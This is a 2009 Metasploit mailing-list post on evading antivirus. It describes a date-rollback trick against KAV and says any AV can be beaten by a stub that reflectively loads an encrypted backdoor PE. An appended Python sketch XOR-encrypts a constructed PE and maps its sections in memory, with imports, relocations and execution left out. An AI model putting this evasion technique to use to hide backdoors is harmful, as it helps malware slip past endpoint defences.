Metasploit mailing list archives
Video Bypassing AntiVirus with Metasploit
From: arcsighter at gmail.com (ArcSighter Elite)
Date: Thu, 15 Jan 2009 16:47:27 -0500
Thierry Zoller wrote:

> Dear ArcSighter Elite,
>
> == Exception to these are KAV and BitDefender who implement different
> proactive methods that detect this memory stuff. ==
>
> They are easy to bypass too, I remember (just an example) that KAV was
> bypassable by setting the date back to a date the license was invalid
> (kept me laughing for a few minutes).

Pardon me, but that was the first trick against KAV and it is silly; the best that could be achieved with that technique is setting the date back, then finding KAV's notification window and closing it, then loading the backdoor, then restoring the date, and closing another window. In summary, silly.

Secondly, let me tell you I'm off topic, as I said, but if my memory doesn't fail me, KAV's proactive defense was triggered by its hooks into ReadProcessMemory and CreateProcess. BitDefender went a little bit more conscious and implemented some sort of REAL memory scan. Those were the first-generation crypters, as far as we go today. I didn't say they couldn't be bypassed, because I did; I just said they were a little bit trickier.

As I said, and for the record if I have no time to finish it: *ALL* AVs should be bypassed by creating a process that reflectively loads a PE (backdoor) encrypted from its resource or data sections. Of course, the backdoor's behavior could trigger the AV in some cases, such as registry access; that's why I preferred coding my own.

Sincerely.
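The technique in the last paragraph of the mail above, a stub that carries an encrypted PE in its own data and maps it into memory itself instead of handing it to the OS loader, sketched as an added Python example. This is not code from the thread, from Metasploit, or from any product named in it. It builds a constructed, minimal but well-formed PE32 image, XORs it with a fixed key as a stand-in for the encrypted resource, and then performs the header-parsing and section-mapping step of a reflective loader on the decrypted bytes. The PE layout, the key, the section contents and every function name are assumptions made for the illustration; import resolution, base relocations and the jump to the entry point are deliberately not implemented.

```python
"""Crypter stub sketch: an encrypted PE carried in the stub's own data,
decrypted in memory and manually mapped (headers + sections) the way a
reflective loader does. Constructed example; nothing here is executed."""
import struct

# Constructed 8-byte key standing in for whatever a real stub would use.
KEY = bytes([0x9E, 0x37, 0x79, 0xB1, 0x5C, 0x1B, 0xD4, 0xE6])

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def build_test_pe() -> bytes:
    """Constructed minimal PE32 with a .text and a .data section (no imports, no relocs)."""
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)  # i386, 2 sections, EXE
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "H" * 2 + "I" * 6,
                      0x10B, 14, 0,                      # PE32 magic, linker version
                      0x200, 0x200, 0,                   # SizeOfCode/InitData/UninitData
                      0x1000, 0x1000, 0x2000,            # EntryPoint, BaseOfCode, BaseOfData
                      0x400000, 0x1000, 0x200,           # ImageBase, SectionAlign, FileAlign
                      4, 0, 0, 0, 4, 0,                  # OS/image/subsystem versions
                      0, 0x3000, 0x200, 0,               # Win32Ver, SizeOfImage, SizeOfHeaders, CheckSum
                      2, 0,                              # Subsystem GUI, DllCharacteristics
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + bytes(128)  # 16 empty data dirs
    text_hdr = struct.pack(SECTION_HDR, b".text", 0x10, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    data_hdr = struct.pack(SECTION_HDR, b".data", 0x10, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    headers = (dos + b"PE\0\0" + coff + opt + text_hdr + data_hdr).ljust(0x200, b"\0")
    text = (b"\xCC" * 16).ljust(0x200, b"\0")             # int3 filler instead of real code
    data = b"payload-bytes".ljust(0x200, b"\0")
    return headers + text + data


def xor_crypt(buf: bytes, key: bytes) -> bytes:
    """Symmetric XOR; stands in for whatever cipher the stub really uses."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(buf))


def pack_carrier(pe: bytes, key: bytes) -> bytes:
    """What the stub would store in its resource/.data section: key || E(PE)."""
    return key + xor_crypt(pe, key)


def parse_pe(pe: bytes) -> dict:
    """Pull the fields a manual mapper needs out of the DOS/NT headers (PE32 only)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]        # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]   # SizeOfOptionalHeader
    opt = e_lfanew + 24                                          # start of IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("not PE32")
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    image_base = struct.unpack_from("<I", pe, opt + 28)[0]
    size_of_image, size_of_headers = struct.unpack_from("<II", pe, opt + 56)
    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr, *_ = struct.unpack_from(SECTION_HDR, pe, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_ptr": raw_ptr, "raw_size": raw_size})
    return {"entry_rva": entry_rva, "image_base": image_base, "size_of_image": size_of_image,
            "size_of_headers": size_of_headers, "sections": sections}


def map_image(pe: bytes) -> dict:
    """The mapping step of a reflective loader: headers, then each section at its RVA.
    Relocations, import resolution and transferring control are deliberately left out."""
    info = parse_pe(pe)
    image = bytearray(info["size_of_image"])              # zero-filled, so uninitialised gaps read as 0
    image[:info["size_of_headers"]] = pe[:info["size_of_headers"]]
    for s in info["sections"]:
        n = min(s["raw_size"], info["size_of_image"] - s["va"])   # never write past the image
        image[s["va"]:s["va"] + n] = pe[s["raw_ptr"]:s["raw_ptr"] + n]
    info["image"] = image
    return info


def load_from_carrier(carrier: bytes) -> dict:
    """What the stub does at run time: decrypt its payload and map it, never touching disk."""
    key, blob = carrier[:len(KEY)], carrier[len(KEY):]
    return map_image(xor_crypt(blob, key))


if __name__ == "__main__":
    carrier = pack_carrier(build_test_pe(), KEY)
    print("plaintext MZ/PE markers visible in carrier:", b"MZ" in carrier or b"PE\0\0" in carrier)
    loaded = load_from_carrier(carrier)
    for s in loaded["sections"]:
        print(f"{s['name']:<6} RVA 0x{s['va']:04x} -> {bytes(loaded['image'][s['va']:s['va'] + 8])!r}")
```

The point the example makes is the one the mail argues about: on disk the carrier contains no MZ or PE signature and no recognisable section bytes, so a file scanner has nothing to match, while the mapped image in memory is a plain PE again. That is exactly what the ReadProcessMemory/CreateProcess hooks and the memory scan attributed to KAV and BitDefender above are there to catch, so the stub alone does not settle the question; what the decrypted backdoor then does (registry access, as the mail notes) is the next thing a behavioural engine sees.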
Current thread:
- Video Bypassing AntiVirus with Metasploit Jerome Athias (Jan 15)
- Video Bypassing AntiVirus with Metasploit Thierry Zoller (Jan 15)
- Video Bypassing AntiVirus with Metasploit Ronald L. Rosson Jr. (Jan 15)
- Video Bypassing AntiVirus with Metasploit Thierry Zoller (Jan 15)
- Video Bypassing AntiVirus with Metasploit ArcSighter Elite (Jan 15)
- Video Bypassing AntiVirus with Metasploit Thierry Zoller (Jan 15)
- Video Bypassing AntiVirus with Metasploit ArcSighter Elite (Jan 15)
- Video Bypassing AntiVirus with Metasploit Thierry Zoller (Jan 15)
- Video Bypassing AntiVirus with Metasploit ArcSighter Elite (Jan 16)
- Video Bypassing AntiVirus with Metasploit Ronald L. Rosson Jr. (Jan 15)
- Video Bypassing AntiVirus with Metasploit Thierry Zoller (Jan 15)
- Video Bypassing AntiVirus with Metasploit ArcSighter Elite (Jan 15)